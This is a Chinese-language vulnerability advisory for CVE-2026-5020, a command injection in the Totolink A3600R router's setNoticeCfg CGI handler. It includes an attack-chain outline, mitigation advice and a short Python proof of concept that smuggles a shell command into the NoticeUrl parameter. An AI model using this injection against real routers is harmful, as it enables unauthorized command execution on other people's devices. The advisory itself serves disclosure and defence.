CVE-2026-5020 CVSS 6.3 中危

CVE-2026-5020 Totolink A3600R命令注入漏洞

披露日期: 2026-03-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5020

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink A3600R

漏洞概述

Totolink A3600R 4.1.2cu.5182_B20201102版本存在安全漏洞。该漏洞源于/cgi-bin/cstecgi.cgi文件中setNoticeCfg函数对NoticeUrl参数处理不当，导致命令注入。攻击者仅需低权限即可通过网络发起远程攻击，无需用户交互即可执行任意系统命令，进而影响系统的机密性、完整性和可用性。鉴于利用代码已公开，用户需尽快修复。

技术细节

该漏洞属于典型的OS命令注入漏洞。漏洞点位于Totolink A3600R路由器的Web管理接口/cgi-bin/cstecgi.cgi脚本中的setNoticeCfg功能模块。当后端程序处理HTTP POST请求中的NoticeUrl参数时，直接将其拼接到系统调用的命令字符串中，而未对特殊字符（如分号、管道符、反引号等）进行有效的过滤或转义。攻击者可以构造恶意的Payload，通过注入特定的Shell命令，欺骗操作系统执行非预期的操作。由于该接口在处理请求时存在逻辑缺陷，攻击者能够绕过基本的防护机制。结合CVSS向量分析，攻击复杂度低（AC:L），且无需用户交互（UI:N），攻击者只需发送特制的HTTP数据包即可触发漏洞。一旦利用成功，攻击者即可在目标设备上执行任意代码，窃取敏感信息或破坏系统服务，对设备安全构成严重威胁。

攻击链分析

STEP 1

侦察

识别互联网上暴露的Totolink A3600R设备，确认其固件版本为4.1.2cu.5182_B20201102或受影响版本。

STEP 2

武器化

构造包含恶意Shell命令的HTTP POST请求数据包，重点在于在NoticeUrl参数中注入命令分隔符和恶意指令。

STEP 3

投递

将构造好的恶意请求发送至目标设备的/cgi-bin/cstecgi.cgi接口。

STEP 4

利用

后端CGI程序接收请求，将NoticeUrl参数直接传递给系统命令执行函数，触发命令注入漏洞。

STEP 5

安装与执行

目标系统执行攻击者注入的Shell命令，获取系统控制权或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target_ip/cgi-bin/cstecgi.cgi"

# Headers
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent": "Mozilla/5.0"
}

# Vulnerable payload
# Injecting a command to echo a string or ping a server to verify RCE
# Example: ;echo pwned
payload = {
    "function": "setNoticeCfg",
    "NoticeUrl": "http://example.com; echo Vulnerable > /tmp/poc.txt" # Command injection
}

try:
    # Send POST request
    response = requests.post(url, data=payload, headers=headers, timeout=5)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Totolink A3600R 4.1.2cu.5182_B20201102

防御指南

临时缓解措施

如果无法立即升级固件，建议通过访问控制列表（ACL）限制对路由器Web管理端口（通常为80或443）的外网访问，仅允许本地网络或VPN连接。同时，应密切关注网络流量的异常情况，特别是出站连接，以检测潜在的漏洞利用活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5020
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5020
3 Details https://www.cvedetails.com/cve/CVE-2026-5020/
4 VulDB https://vuldb.com/cve/CVE-2026-5020
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK_A3600R_setNoticeCfg-32253a41781f80c197eaf8e7558c5ed1?source=copy_link
6 Link https://vuldb.com/submit/779536
7 Link https://vuldb.com/vuln/353905
8 Link https://vuldb.com/vuln/353905/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表